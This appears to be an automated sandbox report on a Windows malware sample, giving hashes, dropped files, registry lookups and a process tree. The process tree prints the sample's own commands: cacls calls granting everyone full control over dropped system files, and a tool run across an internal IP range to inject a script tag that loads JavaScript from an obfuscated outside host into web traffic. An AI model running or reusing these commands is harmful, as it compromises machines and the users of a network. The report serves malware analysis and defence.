Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
26/07/2024, 06:07
Static task
static1
Behavioral task
behavioral1
Sample
72dd19ade2070a1421bd7c1d95f7fd3e_JaffaCakes118.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
72dd19ade2070a1421bd7c1d95f7fd3e_JaffaCakes118.exe
Resource
win10v2004-20240709-en
General
-
Target
72dd19ade2070a1421bd7c1d95f7fd3e_JaffaCakes118.exe
-
Size
177KB
-
MD5
72dd19ade2070a1421bd7c1d95f7fd3e
-
SHA1
b91290d72c58beba3bf7c78ab92fdf937487d149
-
SHA256
8dd1be60829d95e29f1d0644c4254ff8e4758d6b67dcbac6b1661eabb5b24617
-
SHA512
0d880aca29b7ec9725aca38d65302b3121d31d6efbd8f3f6faa4c33ac662fd34f53c09c668ec7fd5140c38bc63307df60e03415954d71976f0594ad095705a38
-
SSDEEP
3072:CsfO80c5HJujHDHKeHgZdAZqJ+gu0iHuprLwoNl8GToutQ:PfO8X5knKeHRqJ2lyU6VoSQ
Malware Config
Signatures
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\drivers\npf.sys 72dd19ade2070a1421bd7c1d95f7fd3e_JaffaCakes118.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\Control Panel\International\Geo\Nation 72dd19ade2070a1421bd7c1d95f7fd3e_JaffaCakes118.exe -
Executes dropped EXE 1 IoCs
pid Process 2280 360uaea.exe -
Loads dropped DLL 5 IoCs
pid Process 2280 360uaea.exe 2280 360uaea.exe 2280 360uaea.exe 2280 360uaea.exe 2280 360uaea.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File created C:\Windows\SysWOW64\Packet.dll 72dd19ade2070a1421bd7c1d95f7fd3e_JaffaCakes118.exe File created C:\Windows\SysWOW64\WanPacket.dll 72dd19ade2070a1421bd7c1d95f7fd3e_JaffaCakes118.exe File created C:\Windows\SysWOW64\wpcap.dll 72dd19ade2070a1421bd7c1d95f7fd3e_JaffaCakes118.exe File created C:\Windows\SysWOW64\360uaea.exe 72dd19ade2070a1421bd7c1d95f7fd3e_JaffaCakes118.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 360uaea.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 72dd19ade2070a1421bd7c1d95f7fd3e_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 1708 wrote to memory of 2996 1708 72dd19ade2070a1421bd7c1d95f7fd3e_JaffaCakes118.exe 93 PID 1708 wrote to memory of 2996 1708 72dd19ade2070a1421bd7c1d95f7fd3e_JaffaCakes118.exe 93 PID 1708 wrote to memory of 2996 1708 72dd19ade2070a1421bd7c1d95f7fd3e_JaffaCakes118.exe 93 PID 1708 wrote to memory of 2752 1708 72dd19ade2070a1421bd7c1d95f7fd3e_JaffaCakes118.exe 95 PID 1708 wrote to memory of 2752 1708 72dd19ade2070a1421bd7c1d95f7fd3e_JaffaCakes118.exe 95 PID 1708 wrote to memory of 2752 1708 72dd19ade2070a1421bd7c1d95f7fd3e_JaffaCakes118.exe 95 PID 1708 wrote to memory of 3776 1708 72dd19ade2070a1421bd7c1d95f7fd3e_JaffaCakes118.exe 99 PID 1708 wrote to memory of 3776 1708 72dd19ade2070a1421bd7c1d95f7fd3e_JaffaCakes118.exe 99 PID 1708 wrote to memory of 3776 1708 72dd19ade2070a1421bd7c1d95f7fd3e_JaffaCakes118.exe 99 PID 1708 wrote to memory of 764 1708 72dd19ade2070a1421bd7c1d95f7fd3e_JaffaCakes118.exe 101 PID 1708 wrote to memory of 764 1708 72dd19ade2070a1421bd7c1d95f7fd3e_JaffaCakes118.exe 101 PID 1708 wrote to memory of 764 1708 72dd19ade2070a1421bd7c1d95f7fd3e_JaffaCakes118.exe 101 PID 1708 wrote to memory of 4320 1708 72dd19ade2070a1421bd7c1d95f7fd3e_JaffaCakes118.exe 103 PID 1708 wrote to memory of 4320 1708 72dd19ade2070a1421bd7c1d95f7fd3e_JaffaCakes118.exe 103 PID 1708 wrote to memory of 4320 1708 72dd19ade2070a1421bd7c1d95f7fd3e_JaffaCakes118.exe 103 PID 1708 wrote to memory of 2280 1708 72dd19ade2070a1421bd7c1d95f7fd3e_JaffaCakes118.exe 105 PID 1708 wrote to memory of 2280 1708 72dd19ade2070a1421bd7c1d95f7fd3e_JaffaCakes118.exe 105 PID 1708 wrote to memory of 2280 1708 72dd19ade2070a1421bd7c1d95f7fd3e_JaffaCakes118.exe 105 PID 1708 wrote to memory of 1148 1708 72dd19ade2070a1421bd7c1d95f7fd3e_JaffaCakes118.exe 108 PID 1708 wrote to memory of 1148 1708 72dd19ade2070a1421bd7c1d95f7fd3e_JaffaCakes118.exe 108 PID 1708 wrote to memory of 1148 1708 72dd19ade2070a1421bd7c1d95f7fd3e_JaffaCakes118.exe 108
Processes
-
C:\Users\Admin\AppData\Local\Temp\72dd19ade2070a1421bd7c1d95f7fd3e_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\72dd19ade2070a1421bd7c1d95f7fd3e_JaffaCakes118.exe"1⤵
- Drops file in Drivers directory
- Checks computer location settings
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" C:\Windows\system32\drivers\npf.sys /e /p everyone:f2⤵
- System Location Discovery: System Language Discovery
PID:2996
-
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" C:\Windows\system32\Packet.dll /e /p everyone:f2⤵
- System Location Discovery: System Language Discovery
PID:2752
-
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" C:\Windows\system32\WanPacket.dll /e /p everyone:f2⤵
- System Location Discovery: System Language Discovery
PID:3776
-
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" C:\Windows\system32\wpcap.dll /e /p everyone:f2⤵
- System Location Discovery: System Language Discovery
PID:764
-
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\system32\cacls.exe" C:\Windows\system32\npptools.dll /e /p everyone:f2⤵
- System Location Discovery: System Language Discovery
PID:4320
-
-
C:\Windows\SysWOW64\360uaea.exe-idx 0 -ip 10.127.1.2-10.127.1.254 -port 80 -insert "<script language=JavaScript src=http://c%65s.K%77%69k.%54o/tj.js></script>"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2280
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 12.bat2⤵
- System Location Discovery: System Language Discovery
PID:1148
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD56c83a1190bdb2e746f13b6110e3e0e1c
SHA114031dbab6cd364026ccb2ac72efac05d0b77d51
SHA256aff3705b95bbccb41c266568a1a687af750528c1dcea5d5b062575c6b7575a97
SHA512e5a59e180fff5c887c037b1012e1722c557d1baf3c0ad5a5d99cd7d6213c02adb0de7c32c9c59d50cb966b36fe81b41bc4e328d8e54e99b30852174ff74c8e65
-
Filesize
8.0MB
MD5a9c6fe21771bce09fe8f82dd463e8863
SHA1b18aa37b478bd3facde96f2250a18647846b8a60
SHA2568c6dcfb66910948270114d1dc1e272f1158d149e49873de02bb1a9cc1f78b991
SHA5121e4abecbeb1750ab037fd4bef1b4b686dce96580a7efba7ee7189e6269e6a6cc62df9bb795dec2a08d59772bfa074e3331c821b04c6ab040bc2aba5263a24f69
-
Filesize
86KB
MD59062aeea8cbfc4f0780bbbefad7cebcb
SHA1c4ad39ec51ad0e84fe58f62931d13cddfde3189e
SHA256b2535129b26366484c487cc2ce536d8fcfa9d1ac1dab0db9560b4532012c352c
SHA51260957548fc2272998aea518acf3b1812ed77f73e960a99ddf0d6b474b0858225286c26554bf81c00acf3cb1c77c5ce458d80e149ed4766287d7e32af9681e646
-
Filesize
66KB
MD5fdd104a9fd3427a1df37041fa947a041
SHA1cca1881a3c02033008f78cc39b712b637c7f3e13
SHA256384e928f13bc1c25ca16b3247d7ca942aec6834fadb05b1487f2c975678d4a9a
SHA5129dd082eb245b443cc75b37c69f0a17e15fcb9cdb676b058d87f9805ec7a928e721a681b940fcdd56fd81da4d308f0d514870c526c4f9c715b256a97ab6bb29f7
-
Filesize
234KB
MD5ce842d25e5b7e6ff21a86cad9195fbe8
SHA1d762270be089a89266b012351b52c595e260b59b
SHA2567e8c0119f352424c61d6fad519394924b7aedbf8bfb3557d53c2961747d4c7f3
SHA51284c23addda6ff006d4a3967b472af10a049b2a045d27d988d22153fc3ba517e21520a31eb061a2ef2abf302e365564dd4601d240ec3d5894fb96f10a9fae97d6